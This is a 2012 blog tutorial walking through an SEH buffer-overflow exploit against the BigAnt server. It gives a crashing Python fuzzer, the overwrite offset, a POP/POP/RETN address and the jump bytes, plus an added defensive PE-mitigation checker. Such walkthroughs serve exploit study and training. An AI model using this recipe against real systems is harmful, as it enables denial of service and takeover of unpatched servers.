Friday, 17 February 2012

Exploit Bigant (SEH)

1. Let's prepare the fuzzer

#!/usr/bin/python
import socket

# Buffer from the post: 2500 bytes of 'A' (0x41) followed by CRLF CRLF.
# Bytes, not str, so the script also runs under Python 3.
fuzzer = b"\x41" * 2500 + b"\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.101', 6660))   # BigAnt server in the lab (address from the post)
s.send(b'USV ' + fuzzer + b'\r\n')    # USV command with the oversized argument
print("==============>")
s.close()
print("Finish")

Run BigAnt under OllyDbg and look at the result.

The application crashes, but the value of EIP is not overwritten. This happens because the application uses SEH: the exception handler runs before the overwritten return address would. To inspect the handlers, choose View --> SEH chain.
Now we know that our buffer landed in the SEH chain. Press Shift+F9 to pass the exception to the program and look at the result:
EIP becomes 41414141.

2. Copy the file vbajet32.dll from Windows
After copying it to BackTrack, save it in the folder /pentest/exploits/framework/
root@justview:/pentest/exploits/framework# ./msfpescan -i vbajet32.dll

The command above reads the DllCharacteristics field of the module vbajet32.dll. What we need from this file is certainty that the 0x0400 bit is not set; the digit values to avoid in that position are 4, 5, 6, 7, C, E and F.
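The DllCharacteristics check that msfpescan -i performs, as an added example that is not part of the original post: it parses the PE optional header and reports which mitigation bits are clear, where 0x0400 is IMAGE_DLLCHARACTERISTICS_NO_SEH and the ASLR/DEP bits are shown alongside it. The header builder and its flag values are constructed test input, not vbajet32.dll.

```python
import struct

# DllCharacteristics bits in the PE optional header (names from the PE spec)
MITIGATION_FLAGS = [
    ("ASLR", 0x0040),    # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
    ("DEP", 0x0100),     # IMAGE_DLLCHARACTERISTICS_NX_COMPAT
    ("NO_SEH", 0x0400),  # IMAGE_DLLCHARACTERISTICS_NO_SEH, the 0x0400 bit the post checks
]


def dll_characteristics(data: bytes) -> int:
    """Return the DllCharacteristics field of a PE image (PE32 or PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    opt = e_lfanew + 4 + 20  # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 in both the PE32 and PE32+ layouts
    return struct.unpack_from("<H", data, opt + 70)[0]


def missing_mitigations(data: bytes) -> list:
    """Names of the mitigations whose bit is clear, in MITIGATION_FLAGS order."""
    flags = dll_characteristics(data)
    return [name for name, bit in MITIGATION_FLAGS if not flags & bit]


def build_test_pe(dll_chars: int) -> bytes:
    """Constructed minimal PE32 header (no sections) carrying the given flags."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    # COFF header: Machine=i386, 0 sections, no symbols, 224-byte optional header
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)  # DllCharacteristics
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for sample in (0x0000, 0x0540):
        print("0x%04x -> missing: %s" % (sample, missing_mitigations(build_test_pe(sample))))
```

Running this over every module an application loads tells a defender which ones were built without these mitigations and should be rebuilt with them enabled.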


3. Search for the location of a POP, POP, RETN sequence in the module.
    In OllyDbg: View --> Executable Modules --> double-click vbajet32.dll. Once the CPU window shows vbajet32.dll, right-click --> Search for --> Sequence of Commands, and locate the sequence.

4. Finding the offset that overwrites SEH
    Now that we are sure vbajet32.dll can be used as a springboard for the SEH overwrite, we look for how many bytes it takes to overwrite the SEH handler.


root@justview:/pentest/exploits/framework/tools# ./pattern_create.rb 2500 > string_pattern.txt



Run the fuzzer; after BigAnt crashes, press Shift+F9.

Use pattern_offset:

root@justview:/pentest/exploits/framework/tools# ./pattern_offset.rb 42326742
Result: 966
We now know that we need 966 bytes to reach the SEH handler.

4. Well, follow these steps :D
Run BigAnt under OllyDbg, run the fuzzer, and after BigAnt crashes press Shift+F9.
We have successfully landed in the SEH handler.




5. Controlling the CPU
    Now that we have the offset of the bytes that overwrite the SEH handler, it is time to put the address of the POP, POP, RETN sequence in vbajet32.dll into the fuzzer at that offset. Don't forget to write the address in little-endian byte order.



Before running the fuzzer, set a breakpoint at the SEH address 0F9A196A in module vbajet32.dll, then run the fuzzer and press Shift+F9.
Result:

The SEH chain table now leads into vbajet32.dll.
Press F7 (step into) until you reach the RETN instruction; OllyDbg will then bring execution to a location on the stack in memory.

Execution has been redirected onto the stack.
We need one more step to move execution to an address with a large free memory region.
Select \xCC (017FFD7C) --> Follow in Dump --> Selection,
which shows the result:
Data in memory
We can see that below the CC there is a very large empty region (\x90) starting at memory address 012CFD84.
Now we use JMP SHORT to tell the CPU to jump forward a few bytes.

In assembly, JMP SHORT has the opcode \xEB \xZZ, where ZZ is the byte value supplied by the user. To reach the address on the stack, a jump of 6 bytes is needed: \xEB\x06\x90\x90.
+=====> \x06 is the operand that makes the jump 6 bytes long.


6. Make the shellcode

Don't forget to run the Apache service.

----> root@bt:/pentest/exploits/framework2# ./msfweb
---> Open a browser at
127.0.0.1:55555/payloads and choose PAYLOADS.



When I ran the fuzzer, SEH saved the wrong file... and I tried to repair my payloads.





FINALLY I want to say thanks to GOD, ALHAMDULILLAH


I SUCCEEDED
